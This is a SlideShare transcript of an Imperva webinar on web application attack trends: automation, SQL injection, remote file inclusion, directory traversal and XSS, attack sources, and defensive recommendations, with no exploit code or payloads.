The State of Application Security: What Hackers Break

1,241 views
1,150 views

Published on

Companies of all sizes face a universal security threat from today's organized hacking industry. Why? Hackers are decreasing costs and expanding their reach with tools and technologies that allow for automated attacks against Web applications. The hacker’s arsenal includes armies of zombies (i.e. global networks of compromised computers) that access large amounts of personal and corporate data that can be sold on the black market.

As part of Imperva's ongoing Hacker Intelligence Initiative, we monitored and categorized individual attacks across the Internet over a period of six months. This webinar will detail the results of this research, which encompasses attacks witnessed via onion router (TOR) traffic as well as attacks targeting 30 different enterprise and government Web applications. The research includes:

• Insight into how automation allows hackers to generate 7 attacks per second
• Overview of the top vulnerabilities exploited by hackers: directory traversal, cross-site scripting (XSS), SQL injection, and remote file inclusion (RFI)
• Detail into which countries generate the most malicious activity
• Recommendations, both technical and nontechnical, for security teams and executive

Published in: Technology, News & Politics
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,241
On SlideShare
0
From Embeds
0
Number of Embeds
34
Actions
Shares
0
Downloads
21
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

The State of Application Security: What Hackers Break

  1. 1. The State of Application Security: What Hackers BreakAmichai Shulman, CTO, Imperva
  2. 2. Agenda The current state of Web vulnerabilities Studying hackers + Why? Prioritizing defenses + How? Methodology Analyzing real-life attack traffic + Key findings + Take-aways Technical recommendations2
  3. 3. Imperva Overview Imperva’s mission is simple: Protect the data that drives business The leader in a new category: Data Security HQ in Redwood Shores CA; Global Presence + Installed in 50+ Countries 1,200+ direct customers; 25,000+ cloud users + 3 of the top 5 US banks + 3 of the top 10 financial services firms + 3 of the top 5 Telecoms + 2 of the top 5 food & drug stores + 3 of the top 5 specialty retailers + Hundreds of small and medium businesses 3
  4. 4. Today’s PresenterAmichai Shulman – CTO Imperva Speaker at industry events + RSA, Sybase Techwave, Info Security UK, Black Hat Lecturer on Info Security + Technion - Israel Institute of Technology Former security consultant to banks and financial services firms Leads the Application Defense Center (ADC) + Discovered over 20 commercial application vulnerabilities – Credited by Oracle, MS-SQL, IBM and others Amichai Shulman one of InfoWorld’s “Top 25 CTOs”
  5. 5. WhiteHat Security Top Ten—2010 Percentage likelihood of a website having at least one vulnerability sorted by class
  6. 6. The Situation Today# of websites : 357,292,065(estimated: July 2011)# of xvulnerabilities : 230 1% 821,771,600 vulnerabilities in active circulation
  7. 7. The Situation Today# of websites : 357,292,065(estimated: July 2011)# of xvulnerabilities : 230 But which will be exploited? 1% 821,771,600 vulnerabilities in active circulation
  8. 8. Studying Hackers Focus on actual threats + Focus on what hackers want, helping good guys prioritize + Technical insight into hacker activity + Business trends of hacker activity + Future directions of hacker activity Eliminate uncertainties + Active attack sources + Explicit attack vectors + Spam content Devise new defenses based on real data + Reduce guess work
  9. 9. Understanding the Threat Landscape:Methodology Analyze hacker tools and activity Tap into hacker forums Record and monitor hacker activity + Categorized attacks across 30 applications + Monitored TOR traffic + Recorded over 10M suspicious requests + 6 months: December 2010-May 2011
  10. 10. Lesson #1: Automation is Prevailing Attacks are automated + Botnets + Mass SQL Injection attacks + Google dorks
  11. 11. Lesson #1: Automation is Prevailing Tools and kits exist for everything
  12. 12. Lesson #1: Automation is Prevailing Apps under automated attack: 25,000 attacks per hour. ≈ 7 per second On Average: 27 attacks per hour ≈ 1 attack per 2 min.
  13. 13. Lesson #1: Automation is Prevailing Apps under automated attack: 25,000 attacks per hour. ≈ 7 per secondTake-away: On Average: 27 attacks per hourGet ready to fight automation ≈ 1 attack per 2 minutes
  14. 14. Lesson #2: The ―Unfab‖ Four
  15. 15. Lesson #2A: The ―Unfab‖ FourSQL Injection
  16. 16. Lesson #2B: The ―Unfab‖ FourRemote File Inclusion
  17. 17. Lesson #2B: The ―Unfab‖ FourRemote File Inclusion Analyzing the parameters and source of an RFI attack enhances common signature-based attack detection.
  18. 18. Lesson #2C: The ―Unfab‖ FourDirectory Traversal
  19. 19. Lesson #2C: The ―Unfab‖ FourDirectory Traversal
  20. 20. Lesson #2D: The ―Unfab‖ FourCross Site Scripting
  21. 21. Lesson #2D: The ―Unfab‖ FourCross Site Scripting
  22. 22. Lesson #2D: The ―Unfab‖ FourCross Site Scripting – Zooming into Search Engine Poisoning http://HighRankingWebSite+PopularKeywords+XSS … http://HighRankingWebSite+PopularKeywords+XSS
  23. 23. Lesson #2D: The ―Unfab‖ FourCross Site Scripting New Search Engine Indexing Cycle
  24. 24. Lesson #2: The ―Unfab‖ FourTake-away:Protect against these common attacks These may seem obvious common attacks, but RFI and DT do not even appear in OWASP’s top 10 list.
  25. 25. Directory Traversal Missing from OWASP Top 10? OWASP Rationale: Directory traversal is covered in the OWASP Top Ten 2010 through the more general case, A4, Insecure Direct Object Reference. ―Insecure Direct Object Reference‖ is different than ―Directory Traversal‖ because in the latter access is made to a resource that, to begin with, should not have been available through the application.
  26. 26. Remote File Inclusion Missing from OWASP Top 10? A3, OWASP Top 10 2007 - Malicious File Execution. Removed in the OWASP Top 10 2010. OWASP Rationale: REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.
  27. 27. Lesson #3: The U.S. is the Source of Most Attacks We witnessed 29% of attack events originating from 10 sources.
  28. 28. Lesson #3: The U.S. is the Source of Most AttacksTake-away:Sort traffic based on reputation We witnessed 29% of attack events originating from 10 sources.
  29. 29. Organizations like these Funded a $27B SecurityMarket in 2010… …All had major breaches in 2011. What’s wrong?
  30. 30. Threat vs. Spending Market Dislocation  The data theft industry is estimated at $1 trillion annually  Organized crime is responsible for 85% of data breaches 1 Threats Spending ― Yet well over 90% of the ― In 2010, 76% of all data $27 billion spent on breached was security from servers products was and ‖ on traditional applications1 ‖ security21 2011 Data Breach Investigations Report (Verizon RISK Team in conjunctionwith the US Secret Service & Dutch High Tech Crime Unit)2 Worldwide Security Products 2011-2014 Forecast (IDC - February 2011)
  31. 31. SummaryDeploy security solutions that deter automatedattacksDetect known vulnerability attacksAcquire intelligence on malicious sources and apply itin real timeParticipate in a security community and share data onattacks
  32. 32. Summary ―Foreknowledge cannot be gotten from ghosts and spirits, cannot be had by analogy, cannot be found out by calculation. It must be obtained from people, people who know the conditions of the enemy‖ 11 Sun Tzu – The art of war
  33. 33. Imperva: Our Story in 60 Seconds Attack Usage Protection Audit Virtual Rights Patching Management Reputation Access Controls Control
  34. 34. Webinar Materials Get LinkedIn to Imperva Data Security Direct for… Answers to Post-Webinar Attendee Discussions Questions Webinar Much more… Recording Link
  35. 35. Questions- CONFIDENTIAL -
  36. 36. Thank You- CONFIDENTIAL -

×